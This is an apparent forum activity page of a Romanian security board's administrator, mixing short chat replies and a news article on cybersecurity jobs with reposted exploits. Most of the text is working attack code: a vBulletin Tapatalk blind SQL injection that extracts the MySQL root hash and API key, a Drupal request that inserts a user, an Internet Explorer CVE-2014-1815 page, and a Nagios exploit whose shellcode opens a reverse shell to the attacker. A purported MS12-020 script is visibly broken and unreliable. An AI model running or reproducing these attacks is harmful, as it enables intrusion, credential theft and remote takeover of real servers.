Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18735

  • Joined

  • Last visited

  • Days Won

    710

 Content Type 

Everything posted by Nytro

  1. Nytro
    Votati.
  2. Nytro
    [h=1]O nou? meserie în România: specialist în securitate cibernetic?[/h]de Liviu Iancu - Mediafax O nou? meserie va ap?rea în România, de specialist în domeniul securit??ii cibernetice, iar în prezent se lucreaz? la fi?a postului, urmând s? fie introdus? în codul ocupa?ional ?i s? i se stabileasc? standarde salariale, a declarat miercuri Sorin Encu?escu, consilier de stat al primului-ministru. "Preocuparea noastr? în acest moment este aceea ca institu?iile s? aib? oameni specializa?i care s? poat? s? lucreze cât se poate de calificat în acest domeniu. De aceea, odat? cu dezvoltarea sistemului de atribu?ii institu?ionale, în momentul de fa?? se lucreaz? inclusiv la fi?a posturilor pe care urmeaz? s? fie încadrate, în a?a fel încât s? putem fi în m?sur? s? cre?m în România ?i s? punem în codul ocupa?ional func?ia de specialist în domeniul securit??ii cibernetice. Aceast? nou? meserie trebuie recunoscut? ?i trebuie introdus? în codul ocupa?ional român, de unde inclusiv putem stabili standarde de salarizare", a spus Encu?escu la un seminar organizat de grupul UTI. El a ar?tat c? în strategia industriei na?ionale de securitate a fost introdus? o nou? component?, cea a dezvolt?rii ?i sus?inerii operatorilor economici publici ?i cei de stat, care î?i desf??oar? activitatea în domeniul securit??ii cibernetice. "Practic, în acest moment, exist? în con?inutul strategiei, o component? care se refer? la încurajarea întreprinderilor mici ?i mijlocii ?i a start-up-urilor în domeniul securit??ii cibernetice. Sprijinim ?i încuraj?m crearea de astfel de companii", a ad?ugat Encu?escu. Consilierul a men?ionat c? statul inten?ioneaz? s? acorde facilit??i fiscale companiilor care investesc în securitatea cibernetic?. Teodor Cimpoe?u, director la compania de securitate cibernetic? certSIGN din cadrul UTI, a declarat c? în România atacurile cibernetice nu sunt f?cute doar de români, ci ?i de c?tre str?ini. "Este o amenin?are, pe de o parte, pentru utilizatorul individual, care st? pe internet, de la simplul fapt c? îi sunt furate datele de login ?i conturile de re?ele sociale, pân? la a-i fi furate datele bancare sau chiar banii din cont. La companii este mai grav, pentru c? le pot fi afectate structurile informatice cu care î?i desf??oar? activitatea", a mai spus Cimpoe?u. Sursa: O nou? meserie în România: specialist în securitate cibernetic? - Mediafax
  3. Nytro
    [h=1]vBulletin Tapatalk - Blind SQL Injection[/h] #!/usr/bin/env python# -*- coding: utf-8 -*- ''' @author: tintinweb 0x721427D8 ''' import urllib2, urllib import xmlrpclib,re, urllib2,string,itertools,time from distutils.version import LooseVersion class Exploit(object): def __init__(self, target, debug=0 ): self.stopwatch_start=time.time() self.target = target self.path = target self.debug=debug if not self.target.endswith("mobiquo.php"): self.path = self.detect_tapatalk() if not self.path: raise Exception("Could not detect tapatalk or version not supported!") self.rpc_connect() self.attack_func = self.attack_2 def detect_tapatalk(self): # request page, check for tapatalk banner handlers = [ urllib2.HTTPHandler(debuglevel=self.debug), urllib2.HTTPSHandler(debuglevel=self.debug), ] ua = urllib2.build_opener(*handlers) ua.addheaders = [('User-agent', 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3')] data = ua.open(self.target).read() if self.debug: print data if not "tapatalkDetect()" in data: print "[xx] could not detect tapatalk. bye..." return None # extract tapatalk version print "[ i] Taptalk detected ... ", path = "".join(re.findall(r"^\s*<link href=[\s'\"]?(http://.*?/)smartbanner/appbanner.css", data, re.MULTILINE|re.DOTALL)) path+="mobiquo.php" print "'%s' ... "%path, data = urllib.urlopen(path).read() version = "".join(re.findall(r"Current Tapatalk plugin version:\s*([\d\.a-zA-Z]+)", data)) if LooseVersion(version) <= LooseVersion("5.2.1"): print "v.%s - OK"%version return path print "v.%s - not vulnerable"%version return None def rpc_connect(self): self.rpc = xmlrpclib.ServerProxy(self.path,verbose=self.debug) def attack_1(self, sqli, sleep=2): ''' SELECT subscribethreadid FROM subscribethread AS subscribethread LEFT JOIN user AS user ON (user.userid=subscribeforum.userid) WHERE subscribethreadid = <INJECTION> AND subscribethreadid.userid = 0"; <INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE ''' query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep) query += "union select subscribethreadid from subscribethread where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0" if self.debug: print """ SELECT subscribethreadid FROM subscribethread AS subscribethread LEFT JOIN user AS user ON (user.userid=subscribethread.userid) WHERE subscribethreadid = %s AND subscribethread.userid = 0"""%query return self.rpc.unsubscribe_topic("s_%s"%query) #no escape, invalid_char="_" def attack_2(self, sqli, sleep=2): ''' SELECT subscribeforumid FROM subscribeforum AS subscribeforum LEFT JOIN user AS user ON (user.userid=subscribeforum.userid) WHERE subscribeforumid = <INJECTION> AND subscribeforum.userid = 0"; <INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE ''' query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep) query += "union select subscribeforumid from subscribeforum where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0" if self.debug: print """ SELECT subscribeforumid FROM subscribeforum AS subscribeforum LEFT JOIN user AS user ON (user.userid=subscribeforum.userid) WHERE subscribeforumid = %s AND subscribeforum.userid = 0"""%query return self.rpc.unsubscribe_forum("s_%s"%query) #no escape, invalid_char="_" def attack_blind(self,sqli,sleep=2): return self.attack_func(sqli,sleep=sleep) #return self.attack_func("-1 OR subscribethreadid = ( %s AND (select sleep(4)) ) UNION SELECT 'aaa' FROM subscribethread WHERE subscribethreadid = -1 OR 1 "%sqli) def attack_blind_guess(self,query, column, charset=string.ascii_letters+string.digits,maxlength=32, sleep=2, case=True): ''' provide <query> = select -1 from user where user='debian-sys-maint' where <COLUMN> <GUESS> ''' hit = False # PHASE 1 - guess entry length print "[ ] trying to guess length ..." for guess_length in xrange(maxlength+1): q = query.replace("<COLUMN>","length(%s)"%column).replace("<GUESS>","= %s"%guess_length) self.stopwatch() self.attack_blind(q, sleep) duration = self.stopwatch() print ".", if duration >= sleep-sleep/8: # HIT! - got length! => guess_length hit = True print "" break if not hit: print "[ !!] unable to guess password length, check query!" return None print "[ *] LENGTH = %s"%guess_length # PHASE 2 - guess password up to length print "[ ] trying to guess value ..." hits = 0 result = "" for pos in xrange(guess_length): # for each char pos in up to guessed length for attempt in self.bruteforce(charset, 1): # probe all chars in charset #attempt = re.escape(attempt) if attempt == "%%": attempt= "\%" #LIKE binary = case sensitive.might be better to do caseinsensitive search + recheck case with binary q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE '%s%s%%' "%(result,attempt)) self.stopwatch() self.attack_blind(q, sleep) duration = self.stopwatch() #print result,attempt," ",duration print ".", if duration >= sleep-sleep/8: if case: # case insensitive hit - recheck case: this is drastically reducing queries needed. q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE binary '%s%s%%' "%(result,attempt.lower())) self.stopwatch() self.attack_blind(q, sleep) duration = self.stopwatch() if duration >= sleep-sleep/8: attempt = attempt.lower() else: attempt = attempt.upper() # case sensitive - end # HIT! - got length! => guess_length hits += 1 print "" print "[ +] HIT! - %s[%s].."%(result,attempt) result += attempt break if not hits==guess_length: print "[ !!] unable to guess password length, check query!" return None print "[ *] SUCCESS!: query: %s"%(query.replace("<COLUMN>",column).replace("<GUESS>","='%s'"%result)) return result def bruteforce(self, charset, maxlength): return (''.join(candidate) for candidate in itertools.chain.from_iterable(itertools.product(charset, repeat=i) for i in range(1, maxlength + 1))) def stopwatch(self): stop = time.time() diff = stop - self.stopwatch_start self.stopwatch_start=stop return diff if __name__=="__main__": #googledork: https://www.google.at/search?q=Tapatalk+Banner+head+start DEBUG = False TARGET = "http://TARGET/vbb4/forum.php" x = Exploit(TARGET,debug=DEBUG) print "[ ] TAPATALK for vBulletin 4.x - SQLi" print "[--] Target: %s"%TARGET if DEBUG: print "[--] DEBUG-Mode!" print "[ +] Attack - sqli" query = u"-1 UNION SELECT 1%s"%unichr(0) if DEBUG: print u""" SELECT subscribeforumid FROM subscribeforum AS subscribeforum LEFT JOIN user AS user ON (user.userid=subscribeforum.userid) WHERE subscribeforumid = %s AND subscribeforum.userid = 0"""%query print "[ *] guess mysql user/pass" print x.attack_blind_guess("select -1 from mysql.user where user='root' and <COLUMN> <GUESS>", column="password", charset="*"+string.hexdigits, maxlength=45) # usually 40 chars + 1 print "[ *] guess apikey" print x.attack_blind_guess("select -1 from setting where varname='apikey' and <COLUMN> <GUESS>", column='value', charset=string.ascii_letters+string.digits, maxlength=14, ) print "-- done --" Sursa: vBulletin Tapatalk - Blind SQL Injection
  4. Nytro
    O sa ma bag si eu daca se mai ofera 2 persoane.
  5. Nytro
    FindWindow, FindWindowEx, GetWindowRect. Sunt multe functii de Windows pe care le poti folosi: Window Functions (Windows) Nu stiu insa ce iti ofera AutoIT-ul.
  6. Nytro
    [h=1]Drupal CVE-2014-3704 insert new user[/h] POST /drupal/?q=node&destination=node HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: 192.168.88.88 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2a1pre) Gecko Content-Type: application/x-www-form-urlencoded Content-Length: 258 name[0%20;insert+into+users+%28uid%2cname%2cpass%2cstatus%29+values+%28123456%2c'greenbull'%2c'$S$DkH0O9Lpt5i1oUi9yYeouLW0ZCAHo/u75ReE1zjCPaPbZoVZQX/m'%2c1%29;;#%20%20]=nTzlWXKY&name[0]=ptSHbjbW&pass=o81NgWxc&form_build_id=&form_id=user_login_block&op=Log+in
  7. Nytro

    Categorie Donatii

    Nytro replied to ZeroDoi's topic in Sugestii

    Puteti folosi categoria "Free stuff" daca doriti sa oferiti ceva. Oferiti cui doriti, pe ce criterii doriti. Bafta!
  8. Nytro
    Whoa: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4182969-security-patch-release-for-vbulletin-connect-5-0-0-5-1-4
  9. Nytro
    Whoa: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4183258-security-exploit-fixed-in-vbulletin-4-2-2-and-4-2-3
  10. Nytro
    MUIE PONTA.
  11. Nytro

    Categorie Donatii

    Nytro replied to ZeroDoi's topic in Sugestii

    Vreau sa vad 20-30 de lucruri pe care le donati inainte de a va da cu parerea.
  12. Nytro
    Vineri e Owasp. Ne vedem acolo.
  13. Nytro
    Sunt cateva chestii utile, dar nu e cine stie ce. Forumuri interesante mai sunt: opensc, trojanforge, rohitab, tuts4you, kernelmode si multe altele. Si reversing.ro al lui @giv .
  14. Nytro
    CCleaner Pro Patching Tut by Kjacky Home Page: http://www.piriform.com/ Tutorial: CCP Sursa: EXETOOLS FORUM
  15. Nytro
    CVE-2014-1815 Html code - Internet Explorer 6-11 CVE-2014-1815 Html code 1: < !doctype html> 2: < html> 3: < head> 4: < meta http-equiv="Cache-Control" content="no-cache"/> 5: < sc?ript > 6: func?tion stc() 7: { 8: var Then = new Date(); 9: Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 ); 10: document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString(); 11: } 12: func?tion cid() 13: { 14: var swf = 0; 15: try { 16: swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) { 17: } 18: if (!swf) 19: return 0; 20: var cookieString = new String(document.cookie); 21: if(cookieString.indexOf("d93kaj3Nja3") == -1) 22: {stc(); return 1;}else{ return 0;} 23: } 24: String.prototype.repeat=func?tion (i){return new Array(isNaN(i)?1:++i).join(this);} 25: var tpx=un?escape ("%u1414%u1414").repeat(0x60/4-1); 26: var ll=new Array(); 27: for (i=0;i< 3333;i++)ll.push(document.create?Element("img")); 28: for(i=0;i< 3333;i++) ll[i].className=tpx; 29: for(i=0;i< 3333;i++) ll[i].className=""; 30: CollectGarbage(); 31: func?tion b2() 32: { 33: try{xdd.re?placeNode(document.createTextNode(" "));}catch(exception){} 34: try{xdd.outerText='';}catch(exception){} 35: CollectGarbage(); 36: for(i=0;i< 3333;i++) ll[i].className=tpx; 37: } 38: func?tion a1(){ 39: if (!cid()) 40: return; 41: document.body.contentEditable="true"; 42: try{xdd.applyElement(document.create?Element("frameset"));}catch(exception){} 43: try{document.selection.createRange().select();}catch(exception){} 44: } 45: < / sc?ript > 46: < /head> 47: < body onload='setTimeout("a1();",2000);' onresize=b2()> 48: < marquee id=xdd > < /marquee> 49: < object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE"> 50: < param name="movie" value="storm.swf" /> 51: < param name="quality" value="high" /> 52: < param name="bgcolor" value="#ffffff" /> 53: < param name="allowScriptAccess" value="sameDomain" /> 54: < param name="allowFullScreen" value="true" /> 55: < /object> 56: < /body> 57: < body> 58: < form name=loading> 59: ¡¡< p align=center> < font color="#0066ff" size="2"> Loading....,Please Wait< /font> < font color="#0066ff" size="2" face="verdana"> ...< /font> 60: ¡¡¡¡< input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;"> 61: ¡¡¡¡ 62: ¡¡¡¡< input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;"> 63: ¡¡¡¡< sc?ript > ¡¡ 64: var bar=0¡¡ 65: var line="||"¡¡ 66: var amount="||"¡¡ 67: count()¡¡ 68: func?tion count(){¡¡ 69: bar=bar+2¡¡ 70: amount =amount + line¡¡ 71: document.loading.chart.value=amount¡¡ 72: document.loading.percent.value=bar+"%"¡¡ 73: if (bar< 99)¡¡ 74: {setTimeout("count()",500);}¡¡ 75: else¡¡ 76: {window.location = "http://www.google.com.hk";}¡¡ 77: }< / sc?ript > 78: ¡¡< /p> 79: < /form> 80: < p align="center"> Wart,< a style="text-decoration: none" href="http://www.google.com.hk"> < font color="#FF0000"> kick me< /font> < /a> .< /p> 81: < /body> 82: < /html> Sursa: CVE-2014-1815 Html code - Pastebin.com
  16. Nytro
    CVE-2012-6096 - Nagios history.cgi Remote Command Execution #!/usr/bin/python # # CVE-2012-6096 - Nagios history.cgi Remote Command Execution # =========================================================== # Another year, another reincarnation of classic and trivial # bugs to exploit. This time we attack Nagios.. or more # specifically, one of its CGI scripts. [1] # # The Nagios code is an amazing monster. It reminds me a # lot of some of my early experiments in C, back when I # still had no clue what I was doing. (Ok, fair enough, # I still don't, heheh.) # # Ok, I'll come clean. This exploit doesn't exactly # defeat FORTIFY. This approach is likely to work just FINE # on other crippled distro's though, think of stuff like # ArchLinux, Slackware, and all those Gentoo kids twiddling # their CFLAGS. [2] (Oh and hey, BSD and stuff!) # # I do some very stupid shit(tm) here that might make an # exploit coder or two cringe. My sincere apologies for that. # # Cold beer goes out to my friends who are still practicing # this dying but interesting type of art: # # * brainsmoke * masc * iZsh * skier_ * steve * # # -- blasty <blasty@fail0verflow.com> / 2013-01-08 # # References: # [1] http://permalink.gmane.org/gmane.comp.security.oss.general/9109 # [2] http://www.funroll-loops.info/ # # P.S. To the clown who rebranded my Samba exploit: j00 s0 1337 m4n! # Next time you rebrand an exploit at least show some diligence and # add some additional targets or improvements, so we can all profit! # # P.P.S. hey, Im not _burning_ bugs .. this is a 2day, enjoy! # import os, sys, socket, struct, urllib, threading, SocketServer, time from base64 import b64encode SocketServer.TCPServer.allow_reuse_address = True targets = [ { "name" : "Debian (nagios3_3.0.6-4~lenny2_i386.deb)", "smash_len" : 0xc37, "unescape" : 0x0804b620, "popret" : 0x08048fe4, "hostbuf" : 0x080727a0, "system_plt" : 0x08048c7c } ] def u32h(v): return struct.pack("<L", v).encode('hex') def u32(v, hex = False): return struct.pack("<L", v) # Tiny ELF stub based on: # http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html def make_elf(sc): elf_head = \ "7f454c46010101000000000000000000" + \ "02000300010000005480040834000000" + \ "00000000000000003400200001000000" + \ "00000000010000000000000000800408" + \ "00800408" + u32h(0x54+len(sc))*2 + \ "0500000000100000" return elf_head.decode("hex") + sc # interactive connectback listener class connectback_shell(SocketServer.BaseRequestHandler): def handle(self): print "\n[!!] K4P0W!@# -> shell from %s" % self.client_address[0] print "[**] This shell is powered by insane amounts of illegal substances" s = self.request import termios, tty, select, os old_settings = termios.tcgetattr(0) try: tty.setcbreak(0) c = True os.write(s.fileno(), "id\nuname -a\n") while c: for i in select.select([0, s.fileno()], [], [], 0)[0]: c = os.read(i, 1024) if c: if i == 0: os.write(1, c) os.write(s.fileno() if i == 0 else 1, c) except KeyboardInterrupt: pass finally: termios.tcsetattr(0, termios.TCSADRAIN, old_settings) return class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass if len(sys.argv) != 5: print "\n >> Nagios 3.x CGI remote code execution by <blasty@fail0verflow.com>" print " >> \"Jetzt geht's Nagi-los!\"\n" print " usage: %s <base_uri> <myip> <myport> <target>\n" % (sys.argv[0]) print " targets:" i = 0 for target in targets: print " %02d) %s" % (i, target['name']) i = i+1 print "" sys.exit(-1) target_no = int(sys.argv[4]) if target_no < 0 or target_no > len(targets): print "Invalid target specified" sys.exit(-1) target = targets[ int(sys.argv[4]) ] # comment this shit if you want to setup your own listener server = ThreadedTCPServer((sys.argv[2], int(sys.argv[3])), connectback_shell) server_thread = threading.Thread(target=server.serve_forever) server_thread.daemon = True server_thread.start() # shellcode to be executed # vanilla x86/linux connectback written by a dutch gentleman # close to a decade ago. cback = \ "31c031db31c951b10651b10151b10251" + \ "89e1b301b066cd8089c231c031c95151" + \ "68badc0ded6668b0efb102665189e7b3" + \ "1053575289e1b303b066cd8031c939c1" + \ "740631c0b001cd8031c0b03f89d3cd80" + \ "31c0b03f89d3b101cd8031c0b03f89d3" + \ "b102cd8031c031d250686e2f7368682f" + \ "2f626989e3505389e1b00bcd8031c0b0" + \ "01cd80" cback = cback.replace("badc0ded", socket.inet_aton(sys.argv[2]).encode("hex")) cback = cback.replace("b0ef", struct.pack(">H", int(sys.argv[3])).encode("hex")) # Eww.. so there's some characters that dont survive the trip.. # yes, even with the unescape() call in our return-chain.. # initially I was going to use some /dev/tcp based connectback.. # but /dev/tcp isn't available/accesible everywhere, so instead # we drop an ELF into /tmp and execute that. The '>' characters # also doesn't survive the trip so we work around this by using # the tee(1) utility. # If your target has a /tmp that is mounted with noexec flag, # is severely firewalled or guarded by trained (watch)dogs.. # you might want to reconsider this approach! cmd = \ "rm -rf /tmp/x;" + \ "echo " + b64encode(make_elf(cback.decode('hex'))) + "|" + \ "base64 -d|tee /tmp/x|chmod +x /tmp/x;/tmp/x;" # Spaces (0x20) are also a problem, they always ends up as '+' # so apply some olde trick and rely on $IFS for argv separation cmd = cmd.replace(" ", "${IFS}") # Basic return-2-whatever/ROP chain. # We return into cgi_input_unescape() to get rid of # URL escaping in a static buffer we control, and then # we return into system@plt for the moneyshot. # # Ergo sum: # There's no memoryleak or whatever needed to leak libc # base and bypass ASLR.. This entire Nagios PoS is stringed # together by system() calls, so pretty much every single one # of their little silly binaries comes with a PLT entry for # system(), huzzah! rop = [ u32(target['unescape']), u32(target['popret']), u32(target['hostbuf']), u32(target['system_plt']), u32(0xdeafbabe), u32(target['hostbuf']) ] # Yes.. urllib, so it supports HTTPS, basic-auth and whatnot # out of the box. Building HTTP requests from scratch is so 90ies.. params = urllib.urlencode({ 'host' : cmd + "A"*(target['smash_len']-len(cmd)) + "".join(rop) }) print "[>>] CL1Q .." f = urllib.urlopen(sys.argv[1]+"/cgi-bin/history.cgi?%s" % params) print "[>>] CL4Q .." f.read() # TRIAL PERIOD ACTIVE, LOL! time.sleep(0x666) server.shutdown() Sursa: [Python] CVE-2012-6096 exploit - Pastebin.com
  17. Nytro
    CVE-2012-0002 - Remote Desktop Protocol (RDP) #!/usr/bin/env python ############################################################################# # MS12-020 Exploit by Sabu # sabu@fbi.gov # Uses FreeRDP ############################################################################# import struct import sys from freerdp import rdpRdp from freerdp import crypto from freerdp.rdpRdp import rdpNego #bind shellcode TCP port 4444 shellcode = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90' shellcode += '\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9' shellcode += '\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56' shellcode += '\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22' shellcode += '\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30' shellcode += '\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81' shellcode += '\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42' shellcode += '\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22' shellcode += '\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9' shellcode += '\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79' shellcode += '\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab' shellcode += '\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa' shellcode += '\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48' shellcode += '\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1' shellcode += '\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0' shellcode += '\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe' shellcode += '\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9' shellcode += '\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84' shellcode += '\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56' shellcode += '\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8' shellcode += '\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79' shellcode += '\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6' shellcode += '\xba\xb5\x60\x56\x39\x4a\xb6\xa9' #Payload payload = '\x41\x00\x5c\x00' payload += '\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49' payload += '\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68' payload += '\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32' payload += '\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43' payload += '\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71' payload += '\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c' payload += '\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74' payload += '\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66' payload += '\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c' payload += '\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b' payload += '\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79' payload += '\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54' payload += '\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36' payload += '\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30' payload += '\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66' payload += '\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73' payload += '\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b' payload += '\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63' payload += '\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a' payload += '\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f' payload += '\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73' payload += '\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c' payload += '\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70' payload += '\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61' payload += '\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33' payload += '\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32' payload += '\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e' payload += '\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39' payload += '\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39' payload += '\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e' payload += '\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e' payload += '\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51' payload += '\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64' payload += '\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37' payload += '\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70' payload += '\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e' payload += '\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73' payload += '\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61' payload += '\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78' payload += '\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e' payload += '\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30' payload += '\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b' payload += '\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b' payload += '\x4f\x69\x46\x4b\x4f\x6e\x30\x68'; class SRVSVC_Exploit(Thread): def __init__(self, target, port=3389): super(SRVSVC_Exploit, self).__init__() self.__port = port self.target = target def __DCEPacket(self): print '[-]Connecting' self.__trans = rdp.transport.cert('rdp_np:%s\\x00\\x89]' % self.target) self.__trans.connect() print '[-]connected' % self.target # Making teh packet self.__stub='\x01\x00\x00\x00' self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00' self.__stub+=shellcode self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x00\x00\x00\x00' self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00' self.__stub+=payload self.__stub+='\x00\x00\x00\x00' self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00' self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00' self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00' self.__stub+='\x01\x00\x00\x00\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3' return def run(self): self.__DCEPacket() self.__dce.call(0x1f, self.__stub) print '[-]Exploit successfull!...\nTelnet to port 4444 on target machine.' if __name__ == '__main__': target = sys.argv[1] print '\nUsage: %s <target ip> \n' % sys.argv[0] sys.exit(-1) current = SRVSVC_Exploit(target) current.start() Nota: Syntax highlight asta jegos 